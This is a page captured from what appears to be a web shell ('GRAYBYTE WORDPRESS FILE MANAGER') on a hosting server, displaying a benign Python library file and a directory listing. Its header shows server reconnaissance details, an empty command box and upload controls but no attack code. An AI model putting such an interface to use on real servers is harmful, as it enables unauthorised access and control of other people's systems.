GRAYBYTE WORDPRESS FILE MANAGER3280

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/hc_python/lib/python3.12/site-packages/importlib_metadata/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/hc_python/lib/python3.12/site-packages/importlib_metadata//_collections.py
import collections
import typing


# from jaraco.collections 3.3
class FreezableDefaultDict(collections.defaultdict):
    """
    Often it is desirable to prevent the mutation of
    a default dict after its initial construction, such
    as to prevent mutation during iteration.

    >>> dd = FreezableDefaultDict(list)
    >>> dd[0].append('1')
    >>> dd.freeze()
    >>> dd[1]
    []
    >>> len(dd)
    1
    """

    def __missing__(self, key):
        return getattr(self, '_frozen', super().__missing__)(key)

    def freeze(self):
        self._frozen = lambda key: self.default_factory()


class Pair(typing.NamedTuple):
    name: str
    value: str

    @classmethod
    def parse(cls, text):
        return cls(*map(str.strip, text.split("=", 1)))

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 23 2025 08:31:29
root / root
0755
__pycache__
--
May 23 2025 08:31:29
root / root
0755
compat
--
May 23 2025 08:31:29
root / root
0755
__init__.py
36.193 KB
May 23 2025 08:31:29
root / root
0644
_adapters.py
3.695 KB
May 23 2025 08:31:29
root / root
0644
_collections.py
0.742 KB
May 23 2025 08:31:29
root / root
0644
_compat.py
1.282 KB
May 23 2025 08:31:29
root / root
0644
_functools.py
2.827 KB
May 23 2025 08:31:29
root / root
0644
_itertools.py
5.226 KB
May 23 2025 08:31:29
root / root
0644
_meta.py
1.724 KB
May 23 2025 08:31:29
root / root
0644
_text.py
2.115 KB
May 23 2025 08:31:29
root / root
0644
_typing.py
0.358 KB
May 23 2025 08:31:29
root / root
0644
diagnose.py
0.37 KB
May 23 2025 08:31:29
root / root
0644
py.typed
0 KB
May 23 2025 08:31:29
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF